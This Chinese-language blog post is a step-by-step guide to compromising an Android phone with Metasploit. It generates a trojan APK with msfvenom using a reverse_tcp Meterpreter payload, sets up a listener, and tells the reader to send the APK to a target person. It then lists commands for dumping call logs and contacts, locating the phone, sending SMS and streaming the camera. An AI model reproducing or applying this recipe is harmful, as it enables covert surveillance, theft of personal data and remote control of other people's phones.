利用msfconsole入侵安卓手机

  • 内容
  • 相关


前期准备


linux kali

安卓手机一部



操作步骤


首先我们看一下我们kali的IP地址(我内网测试,如果你们是有外网的kali服务器可以直接填写外网IP)

1.png


可以看到我们的IP地址为:192.168.205.131

然后我们生成一个apk的木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=端口 R > payload.apk


生成出来的apk文件在root目录下

2.png


然后我们启动msfconsole,kali直接输入msfconsole即可启动

启动好msfconsole之后我们配置监听

3.png

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST IP
set LPORT 端口


配置好之后我们直接exploit启动监听,这个时候就可以把我们生成好的apk木马发个目标人。注:木马的apk文件是打不开的,所以在测试的时候不需要一直点,点击一下就可以了。

4.png

一旦目标人安装了我们的木马并打开了,我们在msfconsole就可以看到反弹回来的一个shell。

5.png


这个时候我们就可以执行一些命令了。比如我们执行webcam_stream就可以打开手机摄像头。

7.png

6.png



常用命令



sysinfo  系统信息
check_root  查看root状态
dump_calllog  下载电话记录
dump_contacts  下载短信
geolcate  定位
send_sms  发送短信
send_sms -d 手机号 -t "内容"   发短信
webcam_chat  网页视频聊天(我手机没合适浏览器没打开)
webcam_stream -i 1 [1前置2后置] 网页摄像头视频流,显示实时画面



本文标签:

版权声明:若无特殊注明,本文皆为《T0ex4》原创,转载请保留文章出处。

本文链接:利用msfconsole入侵安卓手机 - https://www.k1q.cn/post-67.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注